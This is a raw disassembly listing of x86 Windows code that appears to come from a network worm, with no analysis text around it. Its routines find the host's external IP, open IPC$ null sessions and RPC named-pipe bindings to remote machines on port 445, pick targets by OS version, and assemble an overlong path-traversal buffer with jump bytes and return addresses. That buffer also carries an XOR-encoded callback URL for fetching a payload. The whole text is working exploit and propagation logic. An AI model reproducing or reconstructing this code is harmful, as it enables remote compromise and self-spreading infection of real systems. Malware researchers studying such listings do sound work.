lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9A90FF
add esp, 20h
test eax, eax
jz loc_9A9464
lea eax, [ebp+Str2]
push eax
push 20h
pop ebx
call sub_9A9072
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Count]
push eax ; int
lea ecx, [ebp+Str]
call sub_9A9199
add esp, 0Ch
mov esi, [ebp+arg_4]
mov word ptr [esi], 50h
and [ebp+var_1C], 0
mov ebx, offset aTcp ; "TCP"
loc_9A93C3: ; CODE XREF: sub_9A932E+121�j
cmp [ebp+var_1C], 3
jge loc_9A9464
movzx eax, word ptr [esi]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+var_28]
push eax ; Dest
call edi ; _snprintf
mov [ebp+var_23], 0
push ebx ; int
lea eax, [ebp+Str2]
push eax ; int
lea eax, [ebp+netshort]
push eax ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B542A
add esp, 2Ch
mov [ebp+var_34], eax
test eax, eax
jnz short loc_9A9435
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+var_88]
push eax ; Dest
push ebx ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B5837
add esp, 18h
mov [ebp+var_34], eax
test eax, eax
jz short loc_9A9454
loc_9A9435: ; CODE XREF: sub_9A932E+DC�j
call rand
cdq
mov ecx, 2310h
idiv ecx
add edx, 400h
mov [esi], dx
inc [ebp+var_1C]
jmp loc_9A93C3
; ---------------------------------------------------------------------------
loc_9A9454: ; CODE XREF: sub_9A932E+105�j
mov [ebp+var_20], 1
jmp short loc_9A9464
; ---------------------------------------------------------------------------
loc_9A945D: ; DATA XREF: .text:stru_9A3F10�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9461: ; DATA XREF: .text:stru_9A3F10�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9464: ; CODE XREF: sub_9A932E+5C�j
; sub_9A932E+99�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9A932E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9471 proc near ; CODE XREF: sub_9A9580+79�p
cp = byte ptr -38h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 28h
push offset stru_9A3F98
call __SEH_prolog
mov edi, ecx
mov esi, edx
or [ebp+var_20], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
cmp edi, 10h
jnb short loc_9A94B6
push 0Fh ; Count
push esi ; Source
lea eax, [ebp+cp]
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_29], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9A94B6
or [ebp+var_20], 0FFFFFFFFh
loc_9A94B6: ; CODE XREF: sub_9A9471+1C�j
; sub_9A9471+3F�j
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9A9573
mov [ebp+var_1C], ebx
loc_9A94C3: ; CODE XREF: sub_9A9471+66�j
cmp [ebp+var_1C], edi
jnb short loc_9A94D9
mov eax, [ebp+var_1C]
add eax, esi
cmp [eax], bl
jnz short loc_9A94D4
mov byte ptr [eax], 20h
loc_9A94D4: ; CODE XREF: sub_9A9471+5E�j
inc [ebp+var_1C]
jmp short loc_9A94C3
; ---------------------------------------------------------------------------
loc_9A94D9: ; CODE XREF: sub_9A9471+55�j
mov [esi+edi-1], bl
push esi ; Str
call _strlwr
pop ecx
loc_9A94E5: ; CODE XREF: sub_9A9471+A5�j
; sub_9A9471+AA�j ...
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9A9573
push offset SubStr ; "ip address"
push esi ; Str
call strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz short loc_9A9573
add esi, 0Ah
mov [ebp+var_24], esi
xor ecx, ecx
loc_9A950E: ; CODE XREF: sub_9A9471+F9�j
mov [ebp+var_1C], ecx
mov al, [ecx+esi]
cmp al, bl
jz short loc_9A94E5
cmp ecx, 0Fh
jnb short loc_9A94E5
cmp al, 30h
jl short loc_9A9569
cmp al, 39h
jg short loc_9A9569
mov [ebp+cp], bl
xor edx, edx
loc_9A952A: ; CODE XREF: sub_9A9471+D9�j
mov [ebp+var_28], edx
cmp edx, 0Fh
jnb short loc_9A954C
mov al, [ecx+esi]
cmp al, 30h
jl short loc_9A953D
cmp al, 39h
jle short loc_9A9541
loc_9A953D: ; CODE XREF: sub_9A9471+C6�j
cmp al, 2Eh
jnz short loc_9A954C
loc_9A9541: ; CODE XREF: sub_9A9471+CA�j
mov [ebp+edx+cp], al
inc ecx
mov [ebp+var_1C], ecx
inc edx
jmp short loc_9A952A
; ---------------------------------------------------------------------------
loc_9A954C: ; CODE XREF: sub_9A9471+BF�j
; sub_9A9471+CE�j
mov [ebp+edx+cp], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9A94E5
or [ebp+var_20], 0FFFFFFFFh
jmp loc_9A94E5
; ---------------------------------------------------------------------------
loc_9A9569: ; CODE XREF: sub_9A9471+AE�j
; sub_9A9471+B2�j
inc ecx
jmp short loc_9A950E
; ---------------------------------------------------------------------------
loc_9A956C: ; DATA XREF: .text:stru_9A3F98�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9570: ; DATA XREF: .text:stru_9A3F98�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9573: ; CODE XREF: sub_9A9471+49�j
; sub_9A9471+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9A9471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9580 proc near ; CODE XREF: sub_9ACABE+250�p
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
dwFlags = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset stru_9A3FA8
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+var_3C], ebx
xor eax, eax
lea edi, [ebp+var_38]
stosd
stosd
stosd
mov [ebp+ms_exc.disabled], ebx
push ebx ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9A9623
mov [ebp+var_20], ebx
loc_9A95B2: ; CODE XREF: sub_9A9580+51�j
; sub_9A9580+9A�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_9A9623
cmp [ebp+var_20], 4
jnb short loc_9A9623
call rand
and eax, 3
mov [ebp+dwFlags], eax
shl eax, 2
cmp [ebp+eax+var_3C], ebx
jnz short loc_9A95B2
push ebx ; int
lea ecx, [ebp+var_28]
push ecx ; int
push ds:off_9B94E8[eax] ; lpszUrl
call sub_9ABAC6
add esp, 0Ch
mov esi, eax
mov [ebp+var_2C], esi
cmp esi, ebx
jz short loc_9A960C
mov ecx, [ebp+var_28]
cmp ecx, 7
jb short loc_9A9601
mov edx, esi
call sub_9A9471
mov [ebp+var_1C], eax
loc_9A9601: ; CODE XREF: sub_9A9580+75�j
cmp esi, ebx
jz short loc_9A960C
push esi ; hMem
call GlobalFree
loc_9A960C: ; CODE XREF: sub_9A9580+6D�j
; sub_9A9580+83�j
mov eax, [ebp+dwFlags]
mov [ebp+eax*4+var_3C], 1
inc [ebp+var_20]
jmp short loc_9A95B2
; ---------------------------------------------------------------------------
loc_9A961C: ; DATA XREF: .text:stru_9A3FA8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9620: ; DATA XREF: .text:stru_9A3FA8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9623: ; CODE XREF: sub_9A9580+2D�j
; sub_9A9580+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9580 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_9A9638(size_t Size)
sub_9A9638 proc near ; DATA XREF: .text:pStubDescriptor�o
Size = dword ptr 4
push [esp+Size] ; Size
call malloc
pop ecx
retn 4
sub_9A9638 endp
; ---------------------------------------------------------------------------
loc_9A9646: ; DATA XREF: .text:pStubDescriptor�o
push dword ptr [esp+4]
call free
pop ecx
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9654 proc near ; CODE XREF: sub_9AC5BB+3D�p
; sub_9AC789+51�p
Src = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 80h
mov eax, [ebp+arg_8]
push esi
push offset dword_9BA28C
push [ebp+arg_C]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_8+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+Src]
push 80h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+Src]
push eax ; Str
mov [ebp+var_1], 0
call strlen
add esp, 28h
add eax, 0BEh
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov esi, [ebp+arg_0]
mov [esi], eax
jz loc_9A9741
push ebx
push edi
mov edi, 0B9h
push edi ; Size
push offset dword_9B99F0 ; Src
push eax ; Dst
call memcpy
lea eax, [ebp+Src]
push eax ; Str
call strlen
inc eax
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
mov eax, [esi]
add eax, edi
push eax ; Dst
call memcpy
push 15h
lea eax, [ebp+Src]
pop edi
push eax ; Str
call strlen
mov ebx, 0BAh
add eax, ebx
add esp, 20h
cmp eax, edi
jbe short loc_9A971B
loc_9A9703: ; CODE XREF: sub_9A9654+C5�j
mov eax, [esi]
add eax, edi
xor byte ptr [eax], 0C4h
lea eax, [ebp+Src]
push eax ; Str
inc edi
call strlen
add eax, ebx
cmp edi, eax
pop ecx
jb short loc_9A9703
loc_9A971B: ; CODE XREF: sub_9A9654+AD�j
mov eax, [esi]
mov byte ptr [edi+eax], 4Dh
mov eax, [esi]
mov byte ptr [eax+edi+1], 53h
mov eax, [esi]
mov byte ptr [eax+edi+2], 0
push dword ptr [esi] ; Str
call strlen
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
pop edi
inc eax
pop ebx
loc_9A9741: ; CODE XREF: sub_9A9654+63�j
pop esi
leave
retn
sub_9A9654 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9744 proc near ; CODE XREF: sub_9A9BBC+83�p
Dest = byte ptr -120h
var_21 = byte ptr -21h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc_0 ; "\\\\%s\\IPC$"
push 100h ; Count
push eax ; Dest
call _snprintf
push 20h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
mov [ebp+var_21], 0
call memset
add esp, 1Ch
mov eax, offset Password
push 0 ; dwFlags
push eax ; lpUserName
push eax ; lpPassword
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
lea ecx, [ebp+Dest]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_C], ecx
call WNetAddConnection2A
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9A9744 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A97A7(RPC_CSTR NetworkAddr, RPC_CSTR Endpoint)
sub_9A97A7 proc near ; CODE XREF: sub_9A9BBC+9E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
NetworkAddr = dword ptr 8
Endpoint = dword ptr 0Ch
push 14h
push offset stru_9A4008
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call RpcStringBindingComposeA
test eax, eax
jnz short loc_9A97E8
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9A97EC
loc_9A97E8: ; CODE XREF: sub_9A97A7+2D�j
xor eax, eax
jmp short loc_9A9835
; ---------------------------------------------------------------------------
loc_9A97EC: ; CODE XREF: sub_9A97A7+3F�j
mov [ebp+ms_exc.disabled], esi
push esi
push 4
push offset aM ; "M"
push offset aS_0 ; "S"
push offset aAaa ; "AAA"
call sub_9AED5A
add esp, 14h
mov [ebp+var_20], 1
jmp short loc_9A9823
; ---------------------------------------------------------------------------
loc_9A9812: ; DATA XREF: .text:stru_9A4008�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9820: ; DATA XREF: .text:stru_9A4008�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9823: ; CODE XREF: sub_9A97A7+69�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call RpcBindingFree
mov eax, [ebp+var_20]
loc_9A9835: ; CODE XREF: sub_9A97A7+43�j
call __SEH_epilog
retn
sub_9A97A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A983B(int, RPC_CSTR NetworkAddr, RPC_CSTR Endpoint)
sub_9A983B proc near ; CODE XREF: sub_9A98F7+269�p
Dst = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
NetworkAddr = dword ptr 0Ch
Endpoint = dword ptr 10h
push 400h
push offset stru_9A4038
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call RpcStringBindingComposeA
test eax, eax
jnz short loc_9A987F
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9A9883
loc_9A987F: ; CODE XREF: sub_9A983B+30�j
xor eax, eax
jmp short loc_9A98F1
; ---------------------------------------------------------------------------
loc_9A9883: ; CODE XREF: sub_9A983B+42�j
mov [ebp+ms_exc.disabled], esi
push 3E8h ; Size
push esi ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
mov [ebp+var_24], 101h
push esi
lea eax, [ebp+var_24]
push eax
push offset asc_9A4030 ; "\\"
push 31Fh
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
push offset aHhdhh ; "HHDHH"
call sub_9AED38
add esp, 28h
mov [ebp+var_20], 1
jmp short loc_9A98DF
; ---------------------------------------------------------------------------
loc_9A98CE: ; DATA XREF: .text:stru_9A4038�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_28], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A98DC: ; DATA XREF: .text:stru_9A4038�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A98DF: ; CODE XREF: sub_9A983B+91�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call RpcBindingFree
mov eax, [ebp+var_20]
loc_9A98F1: ; CODE XREF: sub_9A983B+46�j
call __SEH_epilog
retn
sub_9A983B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A98F7(int, void *Src, size_t Size, int, int)
sub_9A98F7 proc near ; CODE XREF: sub_9A9BBC+125�p
NetworkAddr = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 88h
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aD_D_D_D ; "\\\\%d.%d.%d.%d"
lea eax, [ebp+NetworkAddr]
push 80h ; Count
push eax ; Dest
call _snprintf
add esp, 1Ch
push ebx
push esi
xor edx, edx
xor eax, eax
mov ecx, 4F8h
push edi
loc_9A993E: ; CODE XREF: sub_9A98F7+63�j
mov esi, [ebp+arg_C]
cmp ds:dword_9B94F8[eax], esi
jnz short loc_9A9954
mov edi, ds:dword_9B94FC[eax]
cmp edi, [ebp+arg_10]
jz short loc_9A99A0
loc_9A9954: ; CODE XREF: sub_9A98F7+50�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9A993E
xor edx, edx
xor eax, eax
loc_9A9960: ; CODE XREF: sub_9A98F7+80�j
cmp ds:dword_9B94F8[eax], esi
jnz short loc_9A9971
cmp ds:dword_9B94FC[eax], 9
jz short loc_9A99A0
loc_9A9971: ; CODE XREF: sub_9A98F7+6F�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9A9960
xor ebx, ebx
loc_9A997B: ; CODE XREF: sub_9A98F7+B3�j
test ebx, ebx
jz short loc_9A9999
cmp [ebp+Size], 190h
ja short loc_9A9999
push 262h ; dwBytes
call sub_9AB746
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9A99AC
loc_9A9999: ; CODE XREF: sub_9A98F7+86�j
; sub_9A98F7+8F�j
xor eax, eax
jmp loc_9A9B72
; ---------------------------------------------------------------------------
loc_9A99A0: ; CODE XREF: sub_9A98F7+5B�j
; sub_9A98F7+78�j
lea ebx, [edx+edx*2]
lea ebx, ds:9B94F8h[ebx*8]
jmp short loc_9A997B
; ---------------------------------------------------------------------------
loc_9A99AC: ; CODE XREF: sub_9A98F7+A0�j
push 2 ; Size
push offset asc_9A4030 ; "\\"
push edi ; Dst
call memcpy
add esp, 0Ch
lea esi, [edi+2]
mov [ebp+var_4], 1F4h
loc_9A99C6: ; CODE XREF: sub_9A98F7+F4�j
call rand
and al, 1
shl al, 5
or al, 41h
mov byte ptr [ebp+arg_0+3], al
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, byte ptr [ebp+arg_0+3]
mov [esi], dl
inc esi
dec [ebp+var_4]
jnz short loc_9A99C6
push [ebp+Size] ; Size
lea eax, [edi+66h]
push [ebp+Src] ; Src
push eax ; Dst
call memcpy
push 0Eh ; Size
lea eax, [edi+1F6h]
push offset a____ ; "\\..\\..\\"
push eax ; Dst
call memcpy
lea eax, [edi+204h]
mov word ptr [eax], 41h
add esp, 18h
inc eax
inc eax
and [ebp+arg_0], 0
mov [ebp+var_8], eax
lea eax, [edi+206h]
mov esi, 206h
mov [ebp+var_4], eax
loc_9A9A34: ; CODE XREF: sub_9A98F7+15C�j
; sub_9A98F7+172�j
call rand
cdq
push 19h
pop ecx
idiv ecx
mov ecx, [ebp+var_8]
lea eax, [edx+42h]
mov edx, [ebp+var_4]
cmp ecx, edx
mov [edx], ax
jnb short loc_9A9A5C
loc_9A9A50: ; CODE XREF: sub_9A98F7+163�j
cmp [ecx], ax
jz short loc_9A9A34
inc ecx
inc ecx
cmp ecx, [ebp+var_4]
jb short loc_9A9A50
loc_9A9A5C: ; CODE XREF: sub_9A98F7+157�j
inc [ebp+arg_0]
add [ebp+var_4], 2
inc esi
inc esi
cmp [ebp+arg_0], 6
jb short loc_9A9A34
mov dword ptr [esi+edi], 20408h
add esi, 4
cmp [ebp+arg_C], 6
jz loc_9A9B14
cmp [ebp+arg_C], 7
jz loc_9A9B14
mov eax, [ebx+0Ch]
and [ebp+var_8], 0
test eax, eax
jnz short loc_9A9A97
loc_9A9A94: ; CODE XREF: sub_9A98F7+224�j
mov eax, [ebx+8]
loc_9A9A97: ; CODE XREF: sub_9A98F7+19B�j
mov [esi+edi], eax
add esi, 4
lea eax, [esi+46h]
cmp esi, eax
mov [ebp+arg_0], esi
jnb short loc_9A9AC7
loc_9A9AA7: ; CODE XREF: sub_9A98F7+1CE�j
call rand
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add dl, 41h
inc [ebp+arg_0]
mov [eax+edi], dl
lea eax, [esi+46h]
cmp [ebp+arg_0], eax
jb short loc_9A9AA7
loc_9A9AC7: ; CODE XREF: sub_9A98F7+1AE�j
add esi, edi
cmp [ebp+var_8], 0
jz short loc_9A9B20
lea eax, [ebx+8]
mov ecx, [eax]
mov [esi], ecx
mov ecx, [eax]
mov [esi+4], ecx
mov ecx, [eax]
mov [esi+8], ecx
mov ecx, [eax]
mov [esi+0Ch], ecx
mov eax, [eax]
mov [esi+10h], eax
mov eax, [ebx+0Ch]
mov [esi+14h], eax
mov eax, [ebx+14h]
mov [esi+18h], eax
mov eax, [ebx+10h]
mov [esi+38h], eax
mov eax, [ebx+10h]
mov [esi+3Ch], eax
mov byte ptr [esi+40h], 0EBh
mov byte ptr [esi+41h], 2
mov byte ptr [esi+44h], 0EBh
mov byte ptr [esi+45h], 58h
jmp short loc_9A9B4E
; ---------------------------------------------------------------------------
loc_9A9B14: ; CODE XREF: sub_9A98F7+182�j
; sub_9A98F7+18C�j
mov [ebp+var_8], 1
jmp loc_9A9A94
; ---------------------------------------------------------------------------
loc_9A9B20: ; CODE XREF: sub_9A98F7+1D6�j
mov eax, [ebx+8]
push 8 ; Size
mov [esi+4], eax
lea eax, [esi+32h]
push offset dword_9A4054 ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
mov byte ptr [esi+3Ah], 0EBh
cmp dword ptr [ebx+0Ch], 0
setnz al
lea eax, ds:5Ah[eax*8]
mov [esi+3Bh], al
loc_9A9B4E: ; CODE XREF: sub_9A98F7+21B�j
and word ptr [esi+46h], 0
push offset dword_9A4044 ; Endpoint
lea eax, [ebp+NetworkAddr]
push eax ; NetworkAddr
push edi ; int
call sub_9A983B
push edi ; lpMem
mov esi, eax
call sub_9AB75A
add esp, 10h
mov eax, esi
loc_9A9B72: ; CODE XREF: sub_9A98F7+A4�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A98F7 endp
; =============== S U B R O U T I N E =======================================
sub_9A9B77 proc near ; CODE XREF: sub_9A9BBC+70�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 1BDh ; netshort
push [esp+4+arg_0] ; int
call sub_9AE3FA
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_9A9BB9
dec eax
dec eax
jz short loc_9A9BAD
dec eax
jz short loc_9A9BA9
dec eax
jz short loc_9A9BA5
dec eax
jz short loc_9A9BA1
dec eax
jnz short loc_9A9BB9
push 7
loc_9A9B9E: ; CODE XREF: sub_9A9B77+2C�j
; sub_9A9B77+30�j ...
pop eax
jmp short loc_9A9BAF
; ---------------------------------------------------------------------------
loc_9A9BA1: ; CODE XREF: sub_9A9B77+20�j
push 6
jmp short loc_9A9B9E
; ---------------------------------------------------------------------------
loc_9A9BA5: ; CODE XREF: sub_9A9B77+1D�j
push 5
jmp short loc_9A9B9E
; ---------------------------------------------------------------------------
loc_9A9BA9: ; CODE XREF: sub_9A9B77+1A�j
push 2
jmp short loc_9A9B9E
; ---------------------------------------------------------------------------
loc_9A9BAD: ; CODE XREF: sub_9A9B77+17�j
xor eax, eax
loc_9A9BAF: ; CODE XREF: sub_9A9B77+28�j
mov ecx, [esp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9BB9: ; CODE XREF: sub_9A9B77+13�j
; sub_9A9B77+23�j
xor eax, eax
retn
sub_9A9B77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
; int __cdecl sub_9A9BBC(u_long netlong, void *Src, size_t Size)
sub_9A9BBC proc near ; CODE XREF: sub_9AC5BB+D8�p
; sub_9AC789+B5�p
Name = byte ptr -188h
VersionInformation= _OSVERSIONINFOA ptr -124h
var_90 = word ptr -90h
NetworkAddr = byte ptr -88h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
netlong = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 188h
push ebx
mov ebx, [ebp+6Ch+netlong]
push esi
mov esi, _snprintf
mov eax, ebx
shr eax, 18h
push eax
movzx eax, byte ptr [ebp+6Ch+netlong+2]
push eax
movzx eax, bh
push eax
mov eax, ebx
and eax, 0FFh
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
lea eax, [ebp+6Ch+NetworkAddr]
push 80h ; Count
push eax ; Dest
call esi ; _snprintf
push ebx ; netlong
mov [ebp+6Ch+var_9], 0
call sub_9A8DB4
add esp, 20h
test eax, eax
jnz loc_9A9D10
or [ebp+6Ch+var_4], 0FFFFFFFFh
push ebx ; netlong
call sub_9AEF58
movzx eax, ax
test eax, eax
pop ecx
mov [ebp+6Ch+var_8], eax
jz loc_9A9D10
lea eax, [ebp+6Ch+var_4]
push eax
push ebx
call sub_9A9B77
test eax, eax
pop ecx
pop ecx
jz loc_9A9D10
lea eax, [ebp+6Ch+NetworkAddr]
push eax
call sub_9A9744
pop ecx
push 2
pop ebx
cmp [ebp+6Ch+var_4], ebx
jnz loc_9A9CD2
lea eax, [ebp+6Ch+NetworkAddr]
push offset Endpoint ; Endpoint
push eax ; NetworkAddr
call sub_9A97A7
test eax, eax
pop ecx
pop ecx
jnz short loc_9A9CD2
push edi
push 26h
pop ecx
mov [ebp+6Ch+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+6Ch+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+6Ch+VersionInformation]
push eax ; lpVersionInformation
call GetVersionExA
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], 5
push 6
pop edi
jnz short loc_9A9CAD
cmp [ebp+6Ch+VersionInformation.dwMinorVersion], 1
jnz short loc_9A9CB8
cmp [ebp+6Ch+var_90], bx
jbe short loc_9A9CA7
push 8
jmp short loc_9A9CB7
; ---------------------------------------------------------------------------
loc_9A9CA7: ; CODE XREF: sub_9A9BBC+E5�j
jnz short loc_9A9CB8
mov edi, ebx
jmp short loc_9A9CB8
; ---------------------------------------------------------------------------
loc_9A9CAD: ; CODE XREF: sub_9A9BBC+D6�j
cmp [ebp+6Ch+VersionInformation.dwMajorVersion], edi
jb short loc_9A9CB8
push 7
loc_9A9CB7: ; CODE XREF: sub_9A9BBC+E9�j
pop edi
loc_9A9CB8: ; CODE XREF: sub_9A9BBC+DF�j
; sub_9A9BBC:loc_9A9CA7�j ...
call rand
cdq
push 0Ah
pop ecx
idiv ecx
xor eax, eax
cmp edx, edi
setl al
pop edi
add eax, 3
mov [ebp+6Ch+var_4], eax
loc_9A9CD2: ; CODE XREF: sub_9A9BBC+8F�j
; sub_9A9BBC+A7�j
push [ebp+6Ch+var_8] ; int
push [ebp+6Ch+var_4] ; int
push [ebp+6Ch+Size] ; Size
push [ebp+6Ch+Src] ; Src
push [ebp+6Ch+netlong] ; int
call sub_9A98F7
lea eax, [ebp+6Ch+NetworkAddr]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+6Ch+Name]
push 100h ; Count
push eax ; Dest
call esi ; _snprintf
add esp, 24h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+6Ch+Name]
push eax ; lpName
call WNetCancelConnection2A
loc_9A9D10: ; CODE XREF: sub_9A9BBC+4C�j
; sub_9A9BBC+65�j ...
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_9A9BBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9D17(wchar_t *Str)
sub_9A9D17 proc near ; CODE XREF: sub_9A9D72+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
Str = dword ptr 8
push 0Ch
push offset stru_9A4098
call __SEH_prolog
mov [ebp+var_1C], 1
xor esi, esi
mov [ebp+ms_exc.disabled], esi
cmp [ebp+Str], esi
jz short loc_9A9D65
push offset a__ ; "\\..\\"
push [ebp+Str] ; Str
call wcsstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9A9D59
push [ebp+Str] ; Str
call wcslen
pop ecx
cmp eax, 0C8h
jbe short loc_9A9D65
loc_9A9D59: ; CODE XREF: sub_9A9D17+2F�j
mov [ebp+var_1C], esi
jmp short loc_9A9D65
; ---------------------------------------------------------------------------
loc_9A9D5E: ; DATA XREF: .text:stru_9A4098�o
